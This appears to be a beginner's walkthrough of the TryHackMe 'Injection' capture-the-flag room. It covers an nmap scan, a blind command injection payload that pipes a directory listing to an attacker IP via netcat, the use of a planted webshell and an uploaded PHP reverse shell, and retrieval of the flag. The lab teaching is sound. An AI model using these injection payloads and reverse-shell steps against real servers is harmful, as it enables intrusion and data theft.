Injection v4
This post is Walkthrough of OS Command Injection. Demonstrate OS Command Injection and explain how to prevent it on your servers. So I thought this would be helpful for beginners.
https://tryhackme.com/room/injection
Let’s get started by deploying the machine and since this is walkthrough machine we have some guide to solve the tasks in this machine and we have totally 5 task.
Nmap Scan
nmap -T4 -sT -sV -A -p- 10.10.245.41
Starting Nmap 7.80 ( https://nmap.org ) at 2020-06-10 10:10 IST
Stats: 0:01:11 elapsed; 0 hosts completed (1 up), 1 undergoing Connect Scan
Connect Scan Timing: About 12.41% done; ETC: 10:20 (0:08:14 remaining)
Warning: 10.10.245.41 giving up on port because retransmission cap hit (6).
Nmap scan report for 10.10.245.41
Host is up (0.20s latency).
Not shown: 65516 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 cc:44:30:82:07:0e:5d:1d:9a:2f:9e:c7:c5:58:78:c8 (RSA)
| 256 73:70:7a:38:45:76:cb:77:ee:bd:a7:a0:b7:33:72:1d (ECDSA)
|_ 256 cc:3e:1a:08:c1:40:7a:3a:c4:52:65:3f:64:f0:c9:95 (ED25519)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: !!WIP!! - Directory Search
4210/tcp filtered vrml-multi-use
7032/tcp filtered unknown
8235/tcp filtered unknown
12965/tcp filtered unknown
14320/tcp filtered unknown
15011/tcp filtered unknown
24363/tcp filtered unknown
25876/tcp filtered unknown
27643/tcp filtered unknown
40281/tcp filtered unknown
41894/tcp filtered unknown
43068/tcp filtered unknown
51584/tcp filtered unknown
62332/tcp filtered unknown
62491/tcp filtered unknown
63680/tcp filtered unknown
64394/tcp filtered unknown
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 866.77 seconds
we would find port 80 and 22 is open which means would be having webserver kind of apache running in the mahine.
Since task1 does not require any answer or flag lets skip and task2 was about command injection and it had a description about it (beginners do read to get base knowlegde about it).
Task -3
Blind Command Injection
we saw that it was running apache server in ubuntu operating system and lets look what does it had
We had a intersecting input and it mentions directory search. We had source code already given by the room.when we look into it, we have a provide with valid user and it check whether user exist or not.
Lets try with www-data, root, are some default user in ubuntu server.
Lets break this input but generating a own payload, since this is grabbing user from /etc/passwd and verifying, we can execute command after that. let try listing the file and getting output through netcat.
root; ls -la | nc 10.8.19.249 4567
nc -nvlp 4567
listening on [any] 4567 ...
connect to [10.8.19.249] from (UNKNOWN) [10.10.245.41] 57348
total 36
drwxr-x--- 4 www-data www-data 4096 Jun 10 03:26 .
drwxr-xr-x 3 root root 4096 May 18 15:21 ..
drwxr-x--- 2 www-data www-data 4096 May 21 03:04 css
-rw-r----- 1 www-data www-data 17 May 22 13:14 drpepper.txt
-rw-r----- 1 www-data www-data 1723 May 26 01:52 evilshell.php
-rw-r----- 1 www-data www-data 2200 May 21 03:04 index.php
drwxr-x--- 2 www-data www-data 4096 May 21 03:04 js
-rw-r--r-- 1 www-data www-data 5493 Jun 10 02:52 shell.php
We found a malicious file called evilshell.php, lets check what potential it has to do.
it was a webshell which was owned by www-data we would potential execute whatever command you want through input parameter. Lets use this to get a reverse shell with help of netcat.
But that did not properly work for me that output was returing to webserver and was display in webpage. I did not like that kind. so I thought to upload a php reverse shell.
we would download and setup a simple http server through python2 or python3 and use wget to download the file in machine. once file has download would listen in some random port in attacker machine and send a get request in shell.php and BOOM you will get a reverse shell.
Once you have completed the walkthrough, learned about command injection; what it is, and how to test for it, and now it’s time to prove what you’ve got! Exploit the vulnerability and get the flag! For this, you can exploit either page. Both are vulnerable.
find / 2>/dev/null | grep flag.txt
/etc/flag.txt
cat /etc/flag.txt
65f**************************4c4
This is was simple and easy room in Tryhackme, but great for beginners to learn about command injection, Thank you.